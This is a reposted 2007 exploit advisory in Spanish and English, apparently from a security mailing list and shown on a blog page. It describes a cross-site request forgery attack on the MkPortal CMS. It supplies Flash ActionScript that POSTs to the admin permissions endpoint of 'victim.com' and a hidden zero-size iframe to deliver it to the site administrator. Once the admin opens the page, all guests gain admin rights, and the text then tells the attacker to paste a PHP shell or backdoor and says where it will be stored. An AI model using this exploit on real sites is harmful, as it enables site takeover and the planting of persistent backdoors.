De: <info_at_burnhead.it>
Fecha: 4 Jun 2007 04:09:19 -0000
('binary' encoding is not supported, stored as-is) MkPortal "All Guests are Admin" Exploit
Fecha: 4 Jun 2007 04:09:19 -0000
('binary' encoding is not supported, stored as-is) MkPortal "All Guests are Admin" Exploit
Vulnerabilidad descubierta y explotada por: Demential
Web: http://headburn.altervista.org
E-mail: info[at]burnhead[dot]it
Mkportal website: http://www.mkportal.it
How to create exploit/Como crear exploit:
Inicia Macromedia Flash y crea un archivo swf con este codigo:
var idg:Number = 9;
var p13:Number = 1;
var Salva:String = "Save+Permissions";
getURL("http://victim.com/mkportal/admin.php?ind=ad_perms&op=save_main", "_self", "POST");
Traduce "Save+Permissions" en el idioma de MKPortal.
Ejemplo: "Salva+questi+permessi" para sitios italianos.
Entonces sube el archivo swf a un servidor web y crea una pagina html con el codigo similar al siguiente:
<iframe src="http://yoursite.com/exploit.swf" frameborder="0" height="0" width="0"></iframe>
Now send the html page to MKPortal administrator.
When admin opens the page all guests will be able to administrate MKPortal.
So you can go here: http://victim.com/mkportal/admin.php?ind=ad_contents&op=contents_new_php
and paste a php shell or a backdoor.
You can find your shell here: http://victim.com/mkportal/cache/ppage_*.php
where * is the ID of the page.
Translate "page" in MKPortal language.
Example: "pagina" for italian sites.
Received on Jan 04 2007
No hay comentarios.:
Publicar un comentario
Déjanos tu comentario, nos permitirá mejorar.
¿Qué opinas de este tema?
¿Tienes alguna duda o sugerencia?
¿Te parece adecuado y completo este tema?
¿Falta información? ¿Cual?